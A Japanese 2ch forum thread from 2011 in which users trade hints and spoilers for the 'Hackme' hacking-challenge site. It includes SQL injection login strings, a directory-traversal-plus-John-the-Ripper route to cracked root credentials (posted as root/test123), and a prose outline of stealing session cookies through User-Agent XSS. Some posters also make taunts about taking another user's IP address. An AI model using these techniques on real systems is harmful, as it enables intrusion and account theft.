【Hackme】ハッキング力検定サイトHackme
1 :
名無しさん@お腹いっぱい。:
2 :
名無しさん@お腹いっぱい。:2011/02/16(水) 23:26:23
Lv2クリアできねぇ・・・
だめだ
Lv2から変な変数が定義されまくっててぐっちゃぐちゃだ
だれかLv2クリアできた奴いる?
たぶんいない
作者がLv1で詰んでるやつ大杉って嘲笑してる・・・
ツイッターによるとLv5まであるらしいな
ムズすぎだろこれ
7 :
名無しさん@お腹いっぱい。:2011/02/17(木) 18:54:53
おまえら頑張れよ2からすすめねえ
やっぱみんな2か
開発じゃなくてIAサーバ設計構築・運用しか経験ないからスクリプトとかあんまわからん
9 :
名無しさん@お腹いっぱい。:2011/02/17(木) 21:12:06
これって手段は何でもいいのかな?
まずは手段とか犯罪以外なんでもいいから、Lv2クリアした猛者あらわれてほしい
blackbuntuかbacktrack持ち出して徹底的にやってみろ
アングラ攻略サイトのほうがおもしろいな
レベルが上がるごとに難易度も上がればやる気出るけど、これじゃ開発者のオナニーじゃん
なんか急に人増えたな
サイト落ちたりしないのか?
>>12 まぁ力抜けよ
こんな下らないサイトにムキになってもしょうがないぞ
>>14 謎解きゲーや脱出ゲーの類だと思ってやってガッカリしただけw
作り手が楽しませるつもりがないなら仕方ないわ
オナニーだな完全に
でもLv5いきたいお
firefoxで最初のページから進まなくて
それ自体がテストだとしばらく・・・というかかなり悩んだ件。
Lv1のページに行くこともできなかったヨ。
ってかマジでLv1と2の差が大きいなw
19 :
名無しさん@お腹いっぱい。:2011/02/18(金) 19:58:24
セキュ板住民は誰も突破できないか・・・
UNIXにスレたてた方がよかったんじゃないか
いや、セキュ板で合ってると思う
でなければプログラ民か
21 :
名無しさん@お腹いっぱい。:2011/02/18(金) 20:18:46
(Lv3) rastynail 称号:ハッカー
(Lv3) xKalimantan 称号:ハッカー
こいつらかっけー
亀頭満タンww
23 :
名無しさん@お腹いっぱい。:2011/02/19(土) 01:26:35
(Lv3) rastynail 称号:ハッカー
(Lv3) xKalimantan 称号:ハッカー
(Lv3) ritton 称号:ハッカー
(Lv3) ymzkei5 称号:ハッカー
Lv2で挫折した…orz
難しいよなぁLv2
26 :
名無しさん@お腹いっぱい。:2011/02/19(土) 19:59:07.48
>>3 バカか?スクリプトって。。。jqueryとかgoogle anal とかしか使ってないだろうが。。。
27 :
名無しさん@お腹いっぱい。:2011/02/19(土) 19:59:54.72
Lv2って突破に必要な情報無くね?
必要な情報は全部cgi内か
28 :
名無しさん@お腹いっぱい。:2011/02/19(土) 22:02:21.23
>>3 アドレスのとおりあのjsって
グーグルの作ったライブラリじゃないの?
lv2ってxssを利用するのかな
29 :
名無しさん@お腹いっぱい。:2011/02/19(土) 22:30:56.10
返ってくるエラーからヒント見つけろ
30 :
名無しさん@お腹いっぱい。:2011/02/20(日) 00:28:11.50
そんなのハッキングじゃなくて昭和のアドベンチャーゲームだろ…
レベル2はソースんなかには答えは絶対ねえよな(´・ω・`)
んじゃあどこにあるんだ( ゚Д゚)ヴォケ!!
ですね
レベル2は、ユーザIDに適当な値入れて
パスワードに、「' or 'a'='a」とか入れるとPHPのエラーが出るから
SQLインジェクションあたりじゃないの?
もう力尽きて寝る
35 :
名無しさん@お腹いっぱい。:2011/02/20(日) 05:29:07.95
たかが腕試しとバカにしてた
全然わからないorz
Lv2はソース見るんじゃなくてSQLインジェクションであるのは間違いないはずなんだが・・・
エラーの内容も不思議で、そっからどう考察していいのか分からん。
37 :
名無しさん@お腹いっぱい。:2011/02/20(日) 13:42:04.86
ああいうエラーが出るんだったら、別にあの文字入れなくてもエラーが出るはずなんだよな。本当は。
38 :
名無しさん@お腹いっぱい。:2011/02/20(日) 14:48:55.96
すげー。
SQLインジェクションだとか気づかなかった。
じゃぁLv3がXSSか。
俺はXSS専門だから諦めた
頑張れよ
このスレ、レベルが低すぎる…
wwwwwwwwwwwwwwwwwwwwww
42 :
名無しさん@お腹いっぱい。:2011/02/20(日) 21:20:31.83
なんか、エラーメッセージが変わっている……。
中の人、何を考えているのやら。
前のメッセージでも十分だったのに更にわかりやすくなったなw
44 :
名無しさん@お腹いっぱい。:2011/02/20(日) 23:55:37.80
SQLインジェクションなんだと思うけど、モノホンの脆弱性が作ってあるんじゃなくて(当たり前か)
SQLインジェクションっぽい動作をするニセモノだから、モノホンの脆弱性を突くツールとかが
通用しなくて、結局のところ、連想クイズになっちゃってる。
いつの間にかLv3突破した奴いるぞwwww
複数のアカウントを一人が作成可能っぽいから
一人が何個もとってたりして…
複数のアカウントでネット上の活動をしてる人間には大あり
>>44 脆弱性探しなんて連想ゲームのようなもんだよ。
ツール使って調べる方がパターン限られてるからな。
50 :
名無しさん@お腹いっぱい。:2011/02/21(月) 12:33:44.95
Lv2 ひどいな。
作者の記述スタイルに添って書かねばならんとは。
これじゃ、パスワード推測とほとんど変わらん。
51 :
sage:2011/02/21(月) 12:40:26.84 BE:2778590467-2BP(101)
クエリエラーが出たから、今度はさらにクエリエラーをでない形に持って行って
そこからWhere句をTrueに持っていく構文を書けばいいのだろうと思うのだが
まず、エスケープシーケンスにしてもクエリエラーが絶対出る
推理できん
52 :
名無しさん@お腹いっぱい。:2011/02/21(月) 12:47:23.23
>>51 たぶん、本質的には正解。
後は、スペースのありなしとか大文字小文字とかTrue にするための式とかのバリエーションを
順列組み合わせで試していくしかない。
こんなのに、休日関わっていた俺ってバカ。
whereをtrueというより作者の記述の仕方でtrueにしなきゃいけないみたいだからきついんじゃないか
54 :
名無しさん@お腹いっぱい。:2011/02/21(月) 12:49:23.89
正解判定を正規表現マッチで行うくらい、普通のエンジニアならやるのにな。
とにかく、かなりむかつきました。
むかつかせるのが目的
>>54 普通のエンジニアなら疑似SQLの実装くらいするのにな。
かなりムカつきました
sqlインジェクションというなの文字列比較w
ヒント: α版
59 :
名無しさん@お腹いっぱい。:2011/02/21(月) 13:41:54.70
β版を待て、ってことか?
あと、あのサイトは何が目的なんだ?
作者の思考は万人共通かを測ること
会社の売名だろ?
62 :
名無しさん@お腹いっぱい。:2011/02/21(月) 14:17:50.21
(Lv4) yoshimura_yuu 称号:ハッカー
このスレにいないのか?
63 :
名無しさん@お腹いっぱい。:2011/02/21(月) 14:27:18.45
twitter にいるみたい。
>>50 気持ちはわかるが、常套句じゃないか?あれ
作者の答えとぴったり一致しないといけないのか・・・
やられた
66 :
名無しさん@お腹いっぱい。:2011/02/21(月) 18:39:57.16
ダミーのDBMSと接続して、実際にSQL走らせるくらいして欲しい
SQLiteあたりの組込みDBMS使えば、ユーザ毎に違うDB使えるでしょ
67 :
名無しさん@お腹いっぱい。:2011/02/21(月) 18:46:45.94
68 :
名無しさん@お腹いっぱい。:2011/02/21(月) 21:06:04.72
難しいよ
lv2
69 :
名無しさん@お腹いっぱい。:2011/02/21(月) 22:06:56.86
ふっ、このスレにはまだLv2を越えたやつはいないようだな。
俺を含めて
Lv2はクリアしたけどLv3難しいな
触ってみた感じXSSだと思うけど…
ゴールデンクロスサイトスクリプティング!!!!!
72 :
名無しさん@お腹いっぱい。:2011/02/22(火) 00:50:25.51
みんながブー垂れたからか、Lv2、一字一句同じじゃないとダメっていうのじゃなくなったみたい。
ハックミーはおわコン
74 :
名無しさん@お腹いっぱい。:2011/02/22(火) 01:55:46.87
>>70 Lv2がんばってやって見る価値ある?
やってみて腹立つ感じだったらやりたくない、、
XSSじゃサーバー側の認証は突破できないんじゃね?
page=を何とかするんだと思うんだが、もうやる気はない。
76 :
名無しさん@お腹いっぱい。:2011/02/22(火) 02:19:23.98
>>74 自己レス
インジェクションの勉強になった
よし、次はlv.3
見栄張ってlv2クリアした発言するのはどこも一緒だな
最後の2文字足りなかっただけで2日なやんでたとか・・・
あってもなくてもどっちも常套句だろー
79 :
名無しさん@お腹いっぱい。:2011/02/22(火) 05:51:17.01
ちなみにLv3をクリアした俺はプログラムなんて一切組めない
HTMLが多少わかる程度だよ
これが現代の邪気眼発動者か
Lv3は最初XSSかと思ったけどXSSができたところでなんだという話だよな…
ただ、XSSみたいなことをすると他と違うエラーが返ってくるね
閉じるタグがはねられる
>>80 せやで!
>>81 Lv.3は通常だとありえない状態になってるから分かりにくいけどURLを見れば手法はピンと来ると思うんだが
昨日さくっとやってみた
とりあえずLv.4まではそんなに困ることなくいけたけど
Lv.5は難しくてパっとはできなかった
85 :
名無しさん@お腹いっぱい。:2011/02/22(火) 09:46:11.44
ってことはLv5をクリアしちゃったってことか・・・凄いな
ランキングで5クリアしてる奴いない・・・
釣りじゃねーの
lv2クリアした。
なんだかんだ言ってるけど一般的じゃないかw
レベル3に行くぜよ。
>>82 とにかく、<〜></〜>って形式の物を送ると、
The input field '</〜>' was not expected.
って出る。
>>83 URL、確かに特徴的だけど、それをどうすればいいんだかわからんw
>>85 いやいやLv.5はまだできてないっスー
パっとできなかったから現在放置中
またやってみるー
>>91 Lv.3で出るよー
でも普通に入れただけじゃ出てこない
>>92 それ多分XSSの形式とは関係ないかな
Lv.1とかから同じようにでてくると思う
俺もLv.5でひょっとして、と思って試そうとしたけど
5で独自に作りこまれたものじゃなさそうだったからやめたー
>>93 じゃぁ、[文字を与えてください]ってエラーが出せるけど
関係ある?
>>94,95
エラーはいろいろ教えてくれてると思うけど、俺はそれ見る前に終わった様子
ソースにヒントはさすがに最初の方だけかと
ネタバレは禁止みたいなんでこのくらいで勘弁してください(;つД`)
これからちょっと触って落ちます
Lv3が相当つまらないらしいな
>>97 別につまらなくはないけど今の時代じゃありえない状態になってる
会社のIDSに記録がw
ツールも落とせないwww
おれログ汚しまくりwwwwwwwww
泣けるな
お前の会社にも、実はインターネット直通のステルスAPとかあるんだろ?
lv3の解きかた方が分かったけど進まないw
ありえないとはこういうことかな・・・
だめだ・・・。Lv3わかりません。
上の方で、XSSなどと出てましたが、結局いろいろと試してもうまくいきません。
>>103 まだ試してない方法があるんだろ
Lv.4はマジでわからない 直近5件のログイン状況が見れることにヒントがあるんだろうが
おい、ランキングのLv3に変なのがいるぞ
Lv2の答えくれLv3からならわかるきがする
じゃあおれはlv3とlv4答えてくれlv5なら余裕でわかるきがするw
Lv3わかんねぇ…。URLが何か変って事しか理解できない…orz
lv3でけた、ものすごく単純で正攻法でしたw
あーあtwitterでほとんどlv3の答え書いちゃったやついるよ
>>110 ものすごく単純で正攻法ならもっとクリアする奴は多いと思う
本来あれを見れるって権限的におかしいから発想だけの問題だろうな
>>111自分で答えを出すまでの行程が楽しいのであっていきなり答えにいっても楽しくないのに!
片方は権限的にも問題なくないか
>>113 片方だけじゃ答えでないでしょ
まさかと思って見てない人もいるんじゃないかと思う
たしかに片方だけじゃでないけどさ、まあhackmeってことを考慮して一応みとくみたいな
ここburpsuite使えないよな?
lv4わかんねー、ブルートフォースはどのlvでもないみたいだし
>>107 Lv2はほとんどこのスレに答え書いてあるじゃん
Lv3はわかんね
『**さんの称号は「ちょっと詳しい人」です。
周りから一目置かれている存在でしょう。物知りですね。』
ってのがなんかむかつくw
120 :
◆nBKtuESn6cjs :2011/02/23(水) 06:46:23.39
lv3で既にネタバレしている範囲で書くけど・・・
両方見たところでどうなるんだ?
直接クリアには繋がらない。
それとも分かればなんなくクリアできる方法なのかい?
難なくクリアできたよ
難なく・・・
ツハモノだよなぁ
難なく・・・か。
きっと俺たちは違う方向へ無駄にがんばっているんだな。
目の前の相棒が脳みそフル回転でがんばってくれているw
もう止めてあげよう、こんなに無駄なわけはない。
Lv3クリアできたよ!!!!
一応管理者ですよ、はい。
自宅サーバーのねwww
↑
本当にクリアできた人にはわかるだろうw
うん
3はクリアできたけどさ
Lv4はUA部分なのかCookieなのか
何を使うのかわからん
lv3クリアのために俺の4COREが珍しく30%稼動してるゼ!
連続スマン、lv3クリアしたが、一言言わせてもらう。
XSS釣りだろ、むしろlv4こそXSSやもだ。
lv3ヒントください。
urlいくらいじっても見つからないし、他のやり方?
今日始めた俺からヒント
XSSは釣り、ディレクトリ遡れ
ここのスレのせいで6時間無駄にしたお。
lv3はこの前2chがハックされたような感じだな。
hackmeって合法的にハックしていいんだよね?
>>130 釣りってかクリアした奴はXSSなんて言ってないと思う
俺はURLを見ればわかると書いたけど
ディレクトリ遡るって、root見るって事?
パスワードmd5暗号化されてない?
てか、俺のそもそものプロセスが間違えてる?
ボクニハムリデシタ
>>136 疑問を投げかけられても目の前で起きている事が事実だ。
多分君にはこの先は本当に無理だよ。
lv3はすぐ方法が分かったけど
lv4はヒントが少ないなぁ。
方法が絞れなくて思いつくこと試してたら日が暮れるw
自分のところにだけ引っ付いてるゴミが味噌なのだろうか・・・
139 :
↑:2011/02/23(水) 15:53:20.66
たぶんLv.3わかったわ
それらしいファイル吐かれたし
問題はこれをどのように使うかだ…
>>141 mjky...
ネタバレはやめた方がいいし…
とりあえず英語にするとDから始まる攻撃方法でやってるんだけど…
DOS attack ですねわかります
lv1〜3まで非実用的なものだったから1v4も多分そうなんだ
lv4は総当りやりたくなる誘惑があるw
トップページ変わった
1万人突破らしい
もっと派手に変えりゃいいものをw
>>147 確かにw
まぁトラヒックの問題とかもあるだろうけど。
お前らがDoSとかやるから
lv4は4人、lv3は76人とは
lv3の篭城は崩れたようだがlv4はまるで新世界だなw
lv3がこんなに増えたのはtwitterで何も考えないアホな奴が
ほとんどネタバレに近いことを書いてるからだと思うよ。
lv4の問題載せるのはアリですか?
lv3の解答を載せてからならアリ
lV3わかんないお。。。
第五のlv4にネットファイアの中の人がw
完全に出遅れたお
ダメだ、lv3解けて当然になってるのに
lv4全くわかんねえ。
そうだ、ヒントだ、ヒント。ヒントを、ヒントをくれ!
お願いだ!!頼・・・む...
とかいってみるテスト
あー俺もたぶん
>>137と同じ状況で行き詰った。
暗号化解析すんのこれ?
lv4簡易化修正入りました
159 :
名無しさん@お腹いっぱい。:2011/02/23(水) 23:44:44.42
ところでlv1の答えを教えてくんないかな?
1万人たっせいからの75倍のアクセス、だれだよやったのw
24時間かけても無理だった。
俺は所詮、スクリプトキディに過ぎなかったか。
おまいらも、もう認めたらどうなんだ。
週末まで元の生活に戻るとしよう・・・・・・。
ハム速ってブログが載せてたけどそのせいで503とかうぜぇわ・・・
LV4のヒントって前からあったのかな 露骨すぎワロタ
164 :
名無しさん@お腹いっぱい。:2011/02/24(木) 01:58:38.28
>>119 普段マタークSQLを触らない組み込み屋の俺には助かった。
165 :
名無しさん@お腹いっぱい。:2011/02/24(木) 02:30:45.40
page= に何を入れたらいいかさっぱり分からん。 /etc/passwdとかダメだし。。。
Lv3で2つのファイル見れたけど意味がわからない
ヒントない?
167 :
名無しさん@お腹いっぱい。:2011/02/24(木) 02:55:46.67
ありえないパスで見れたけど、パスクラ持ってないよ
168 :
名無しさん@お腹いっぱい。:2011/02/24(木) 02:56:52.52
>>129 何かオススメある?John the GUIとかがよいの?
ただのツールの使い方じゃねえかw
どのツールがよいのか教えててよ
ggrks
今やってきてLv2までクリアしたけど、にわかじゃあLv3わからねぇー
そもそもなんの認証使ってるかもわからんのじゃ無理w
おはよう、lv4進展なしか
>>168 俺はそれ使った
>>173 俺は門外漢でここに立っていたぞw
結局ゴリ押しなのか。。。
4はどうみてもXSS系なんだけどなぁ
177 :
名無しさん@お腹いっぱい。:2011/02/24(木) 05:04:51.91
二つのファイルは手に入った
John the guiでunshadowしたいんだけど、mhtファイルのままでいいの?
人に聞くのもいいけど自分で調べてこそハッカーや
ソーシャルは別な
誰だよDDoSしたやつw
Lv4 総当りスクリプト書いてくる。
パタン少ないし、一秒に一回なら大丈夫だろ。
>>180 BAN強化中だお、そうでなくともそのパターンではじかれた人いるし・・・
182 :
名無しさん@お腹いっぱい。:2011/02/24(木) 05:53:20.94
Lv4って普通だったら釣れるの待たなくちゃいけなくない?
方向性が違うのかな・・・。
お前らXSSって余所のサイトと連携しないと意味ないこと分かってんのww
あんだけtwitterのネタバレにはうるさかったのにもうここでもネタバレが始まってるなw
ここ見りゃちょっとPCに詳しい人ならLv.3まではクリアできるだろw
Lv.3をクリアするために切り裂きジョンをコンパイルした
>>169 自分のサーバに対してアタックかけるのは管理者として普通の行為だからだよ。
Lv5まであるという話だけど、もうLv6も用意されてるよな?
あとTwitterでLv4相当の問題を募集してるけどこれはLv4が差し替えになったり分岐したりするんだろうか。
guesses: 1 time: 0:00:13:40
4万5000人か。
大ハッキング時代の幕開けだなw
ネタバレひどすぎるだろ。
lv3まではググればほぼ出来るという・・・。
まぁそれもクラッキングの手順ではあるのかしらん。
常識的だとすれば問題ないかと。Lv4はさっぱりだがL
Lv4の解きかたがわかった!!!!!!!!!
あとは作者が意図する条件を探すのみだ。
193 :
名無しさん@お腹いっぱい。:2011/02/24(木) 10:05:03.27
LV3
パスワードはわかったけどユーザー名が分からん…
セットのはずだが
やり方間違ってるんじゃね
>>193 セットだな。パスワードが分かった段階で軽く分かるはず
196 :
名無しさん@お腹いっぱい。:2011/02/24(木) 11:31:01.75
198 :
名無しさん@お腹いっぱい。:2011/02/24(木) 11:45:02.99
unshadowできなくね?
>>198 相当回数トライしてできました。ちなみに切り裂き
>>197 問題の変更?むしろ有難いではないか。
lv1〜3は
>>119や
>>169のように、思いつけば
はなからググればできるのだから・・・・・・
・・・lv4はもうちょっと待ってっっ
201 :
名無しさん@お腹いっぱい。:2011/02/24(木) 12:22:45.52
>>199 ああ、切り裂きヨハンだよね?上にもあったように、ヨハンGUIでunshadow仕様と思うんだけど、出てくるのが0バイトの空っぽのファイルのみ
もしよければ使える拡張子だけでも教えて欲しい。それともURLをまるごとブチ込むの?
ggr
やっとレベル2クリア><
これってブラウザ以外にツール必要なの?
ツール前提で不正アクセス禁止って糞だと思うんだが
ググって出てくるのがここじゃないのww
別にツールなくてもできるよ、手計算すればw
レベル3は楽勝過ぎw
もう問題かえてくんないかな、ネタバレしすぎ
LV4も楽勝w
XSSだね。
ユーザエージェントに書き込めばおk
こいつネタバレしやがった
212 :
名無しさん@お腹いっぱい。:2011/02/24(木) 14:00:34.74
すげぇ・・とか思われると頭のどっかで思ってるんだろうな。
LV4ごときでハッカー扱いとか世の中なめすぎ
214 :
名無しさん@お腹いっぱい。:2011/02/24(木) 14:03:36.92
なんで書いちゃうの?Lv4クリア者のリストが短いほうが嬉しくないの?
無粋すぎて身の毛がよだつわ
twitterなんてもっとひどいぞlv1からやってること逐一書いてるバカとか、バカばかり
すげぇ・・・バカ。
馬鹿か本当に天才過ぎるんだろ。
まあ仮に天才だったらlv4をクリアした人数が増えてるはずだけどな
johnのGUIはiniが見つからないってエラーになると思うが。
知ったかぶってXSSとか言っとけばバカが釣れる
ここがメルカトル速報だ
てかレベル5まだぁ?
223 :
名無しさん@お腹いっぱい。:2011/02/24(木) 14:27:01.27
おちんちん
2chにもtwitterにも禁書厨が沸いてこないのが意外だった
LV4のヒント:sessionid
あーもう答えいっちゃったかな
lv4のヒント:html
お前ら釣りすぎw
lv4ヒント:javascript
lv4何がどう修正されたの?
>>201 ツールのマニュアルも読めないの。そりゃいいハッカーになれるよ
lv4のヒント:CSS
Lv3の問題かわった?
Lv4がXSSって言うけどさ、それってログインできない人にしか効果ないんじゃねw
from_VIPwww おまwwwちょwww
ハッカー増えた?めりこんじゃった?
何もわかってない証拠
>>238 あぁ・・・お前全く仕組みを理解できてないわ
>>238 できないんだから、やり方が間違ってんだろ。
おまいら、ネタバレ騒いでるけど
>>128、
>>130あたりで既に濃厚なんだから
それほどネタバレにならんだろ
実際は、擬似っぽい+コード組めないため
俺はそこでとまってる
>XSSやもだ
やもって何?
>>244 人に回答聞いてクリアしてもつまんねーぞ?
>>247 ありがとう
なんとかファイルが見えたよ
でもこれ暗号化されてるじゃんヽ(`Д´)ノウワァァァン!!
残念だったね
最近のゆとりはパないな・・・
それよりLv.4の手順は分かるんだが俺が自分で書いたものだと消されてしまうんだよね
これはあくまでクラック体験サイトだから作者の答えと一致してないとダメって事なのか?
そんなことはLV2を見れば明らか
>>253 俺が始める前のLv.2はダメダメだったらしいが改善されてたみたいなんだよな
ちくしょう!!!試してくしかないな
>>252 使える文法に沿ったハックじゃないと却下される
Lv4て手法が多すぎて一致させるほうが難しくないかコレ
Lv3普通の暗号化ならともかく
塩漬けされてて解読できるの?
それとも総当たりするんだろうか
259 :
名無しさん@お腹いっぱい。:2011/02/24(木) 16:29:57.84
結局のところ本当に脆弱性があるわけじゃなくてそれっぽく作ってるだけのクイズなんだよな…
LV4はなかなか作り手側が期待してる答えが見つからん
このスレネタバレ祭りだな
LV3ネタバレ激しいんで答え言うわ。
ID:root
Password:test123
あーあ
答えなんてどうでもいいから考え方が知りたい
これがハッカーの道をそれたおこさまか。あわれなもんだ。
PSPとかでもHalloworldだけ公開して脆弱性潰されてるし、どこでも同じ馬鹿はいるもんだ
WEBアプリ作ったことない奴とかLinux運用したことも無い奴は帰れってことだ
>>266 読みが浅いな。
肉を切らせて骨を断つって言葉知らないのか?
肉を切らせたら骨抜かれちゃって骨断てなくなるのに
もう答えでたから考え方だけ言うと手法はディレクトリトラバーサル
サーバのrootパスワードが置いてあるディレクトリにアクセスができる脆弱性なんだが、それだけではパスがわからなくてshadowにある暗号化されたものと合わせて初めてパスの解析ができる(まぁ本来はshadow見るにはroot権限いるわけだが)
その解析の結果とログインのパスが同じだったってだけだな
ドヤァ・・・
john-mmx --users=root passfile
余裕でした
自力でLv.3クリアしたのがあほらしくなってくるな
答えだけのネタバレなら運営が変えてしまえばすむことだが、
考え方まで書かれちゃうともうだめだな
2×3と3×2は違うというあれだな
これいったん
Lv2の答えわからなすぎてむかついてきた。
' OR 't' = 't
でいいだろ
foobarさんどこいってしもたん・・・?
> その解析の結果とログインのパスが同じだったってだけだな
この無知感がたまらないな。
あと、mmx版なんて使ってるのはまさにキディ
どうせ問題自体変わるんじゃないのか
5番以内にクリアしたのに500人以上いるし
>>271 なんでWebなのにrootが使えるのか知ってたら教えてほしい
>>282 これalpha版だからいろいろといい加減だろ
暫定的に停止だと
ソースはネットファイア公式Twitter
まあ妥当な判断
2chに解説とID/Pass書いた上にドヤ顔で解説してる馬鹿がいるってつぶやきで発覚したなw
GJ!ここの誰か!
土曜日に公開すれば良かったな。
一気にLV3 1万人突破とかなったらおもしろい
Lv4がわからん
UA偽装すればXSSできるのはわかるけど
ログ残したあとにfoobarさんやhogehogeさんとやらがアクセスしてくれるのか?
自演乙w
でもこういうのって自分で答え出すから楽しいのにな
お前らもクリアした瞬間アドレナリンがわっさー!と出たろ?
ツイッターに堂々とコピペスクリプト書いたヤツがいるぞw
@qmotasつまんねえ
ネタも分からない馬鹿
視ね
>>291 いや、解析結果を見て、ああなんでこれ試さなかったんだろwっておもった
早く問題変えろよ。
ネタバレしたやつ死ねよカス。
マジカス。しね
>>290 UA偽装したら普通にログイン失敗画面でjavascriptが勝手に実行されるから、
5ログ中の一番下の奴(=foobar)が失敗画面見るわけで、
自分のクッキーを別鯖に送るように書けば良いんだよ。
んで別鯖をお前が監視して、ゲットしたセッションIDをゲットできるわけだが、
その後にfoobarはログイン成功するから、
セッションIDを自分のブラウザのクッキーに仕込んでアクセスすればログイン成功
マジレスしたら変なのが沸いてくるこんなalpha版レベルのサイトより海外に面白い脆弱性エミュサイトあるから探してみ
レベルも全然違う
もう停止したw
対応早いなw
>>297 解けたのか?
適当にやると全部置換されちまう
LV3合格者の総数が増えたり減ったりしてるんだけど、ばらした奴がばれてBANされてるの?
MSIE6だからActiveXObject使ってAjax?
とりあえずサーバ管理する時はLv2〜Lv4くらいは最低でも対応してないと危険ってことがよく分かった。
そういう意味でとても有意義だった。
ググって手法を探す作業も悪くない
qmotas くもたし
イエーイ,セキュ板の
>>293見てるー?
8分前
きめえ
このぐらいのことはサイト作る時点で想定しない方がおかしい。
ログイン成功時点でセッションID変わるだろ?
twitterと2chで連絡とるなw
>>301 俺なら晒されたID/パスを罠にしてBANコースだなw
qmotasみんなでフォローしてやろうぜ
ネタバレいやなら2chなんて見るなよw
ばかじゃないのw
>>306 聞く前に確認しろよ。目の前の箱はダンボールか?
>>312 公式のルールも守れない屑が吠えてろよwww
5番目ってfoobarなの?
>>303 2と4は基本で、3はあり得ないと思う。
でも基本中の基本をやらないでCSRFみたいな手に引っかかるmやpで始まる超有名大手サイトも日本にはあってな…
なんでこいうのってhogehogeが多いの?
piyopiyo
fooとbarの日本語版
慣例みたいな感じ
piyopiyo最近見かけないな・・
>>315 ここは本当にログインできるサイトじゃないだろw
それに別鯖とか持ち出してどうするよww
piyoよりfugaだな
俺はhogeを使う奴の書いたコードは信用しないことにしている
>>297 やはり、鯖必要か。俺は鯖用意したくなくて、自分のクッキーを
書き換えてログオンできたことにする方向で考えていた。
答えうpして
ログイン失敗したやつがfoobarでもhogehogeでもないのであきらめた
スクリプトからCookieだけ飛ばさせて自鯖を監視してたのにずっとぼっちだった俺はなんだったんだ・・・
>>331 ログインに失敗したのはGoogle先生です
実際に他の鯖と通信させるとかチェック面倒そうじゃね?
とかつい作る立場で考えてしまったんだが・・・
別に面倒じゃないだろ
なに「深く考えすぎて逆にわからなかった」みたいな言い方してんだよ
Lv3暫定的に停止って言ってたけど動いてるな
パスワード通らないし、クリア不可能状態?
面倒だろ
スクリプトうんぬんはわかるがあのログの見方がわからん
他のサーバーに飛ぶわけないだろ。
そんなことしたらネットファイアが攻撃もとのサイトになるじゃないかw
>>337 UAの対して規定のデータ送るだけだから面倒じゃないはず
こういうのって向こうさんのログは面白そうだよね。
Lv3のパスワード一応分かったんだけど、入力しても間違ってるって言われた…
もうギブアップだわ…
>>340 >>297のとおりだと、誰かが書いたスクリプトによって、どこかのサーバへのリクエストが行われ、
それが成功したかどうかを検知して次のステージに進ませるんだよねぇ。
俺は面倒だと思うなぁ。
>>297が中の人で、このスレを見ている人間が管理しているサーバを見つけようとしているのなら無粋なことをした。
>>297 え、向こうが想定した内容のUAにしてアクセスすればわざわざbotがアクセスしに来てくれるの?
俺はそんな面倒な事じゃなくて作者が想定してるjsでいけば作者からのjsで答えを教えてくれるくらいのレベルで考えてたんだが
あのログ、やるたびに順繰りさせればいいのに
毎回エンティティ変換されて涙目な俺は魔法使い
「みんなでqmotasフォローしようぜ」とか言ってたけど、フォローしたの俺ともう1人だけじゃないか?
フォローしてどうすんの?
353 :
名無しさん@お腹いっぱい。:2011/02/24(木) 17:56:49.11
>>350 仲間。昨日からLv4でインジェクション起こせなくて詰まっとるw
LV3でとまったーorz
>>353 あ、前はこれだったの?
じゃあ別の方法考えないとだめかなぁ。。
lv4
確実に動く(自サイトで実証してから)スクリプトで
相当な方法を試しているけどもダメだな。
何を想定したんだかw
正解意図の回答はいつになったら出るんだろう・・・
これはもう宝くじ状態な気がする。
同じサイト状態ならハッキング可能であろうスクリプトもはじかれる。
UA偽造しようにも後ろに,gzip(gfe),gzip(gfe),gzip(gfe)がついてうぜえ
自サイトってどうやって作るの?
qmotas フォローしても何もでませんよ
12分前
こっちがいろいろお見舞いするんだよ
>>363 ん?lv3のパス晒してドヤ顔してた子が逆恨みの粘着か?
>>363 セキュリティ板にここまで頭の弱い子がいたとわ・・・
366 :
名無しさん@お腹いっぱい。:2011/02/24(木) 18:22:42.49
>>366 wwwwwwwwwwwwwwwwwwwww
qmotasのIP抜きました1
IPアドレスがわかったんだ!すごいね!きみならクラックできるよ!!
>>367 冷蔵庫開けたら卵と牛乳しかなかった。
ミルクセーキでも作ってやろうか。
>>362 UAだけで同一とおもっちゃってよかったのか
374 :
名無しさん@お腹いっぱい。:2011/02/24(木) 18:33:00.02
ブルートフォース解禁して欲しいw
力押し一度やってみたい。
>>373 googleのロボットだったらもっと別のUAだろ。
これは実際のハックじゃなくて、必要な情報だけを載せた脱出ゲームなんだよ。
鯖飛ぶじゃねーかw
>>358 俺も同じ状態だ
想定してたやつ全部弾かれたわ
もはや作者の意図を読めクイズだな
>>377 100の解き方があっても1つの解き方じゃないとダメだからな・・・
ネットファイアの技術力アピールのつもりが、技術力の低さをアピールする結果にw
>>378 一応Lv2はバリエーション増えてるみたいだけどね。それでもちょっと少なすぎる感はある
だいたい、ちょっと答えをばらされたぐらいで停止措置しなきゃいけないとか、
何でこの程度の事も予測できていないの?って言いたいね。
まるで行き当たりばったり。
あらかじめ予測してすぐに対処できるように準備するのはセキュリティのイロハのイでしょうが。
こんな会社に仕事任せるのは怖くてできないわ。
rベル4のログイン失敗したやつってなんだ?
alpha版なんかださずに全部実装してからだせばいいものを、そしたらエラーも正しいの返ってくるのに
>>381 いまさらそこが止まったところでクリア済みの人には影響ないし、いいんじゃないの
最初の方に試したスクリプトが
いつの間にかOKレベルになってたらショックだよ・・・
そうでないことを願おう。
おまいらlv4どのブラウザつかってる?
FireFox
>>386 perl+WWW::Mechanize
俺クロームで
糞更新もふまえて
UA書きかえるの地獄なんだけど
chromeってcookie編集できなくね
webkit系でやりたいならIronにしとけ
レベル3ってMD5の解析せずにパスワードを知る方法無いの?
>>394 UA加工したまま拡張いれようとしてたからダメだっていわれつづけてたw
正規のUAだと問題なかったw
>>393 MD5はデコードできないんでしょ?ツール使うのは頭悪そうだから他に方法無いのかなって思いました。
397 :
名無しさん@お腹いっぱい。:2011/02/24(木) 19:13:39.59
オミトロン使えよ
しかし、いい客寄せ宣伝になったな。
399 :
名無しさん@お腹いっぱい。:2011/02/24(木) 19:15:04.65
やっとLv4クリアできた
途中の仮定操作に詰まってたよ
400 :
名無しさん@お腹いっぱい。:2011/02/24(木) 19:19:41.76
LV4てマジで外部鯖に送信しないとダメなの?
投げつけてもアクセスこないと思うんだが…。
sessionidは盗んだ・・自分のクッキー変えたら自分のセッションなくなるよな・・・あれ?
Lv4がわからん。
javascript:〜
style="x:expression(〜
も通らん。なんだこれ。
405 :
名無しさん@お腹いっぱい。:2011/02/24(木) 19:33:00.34
Lv3はシングルクラックでオッケーなん?
自分のセッションIDとかいう落ちだったりしねーよな・・・
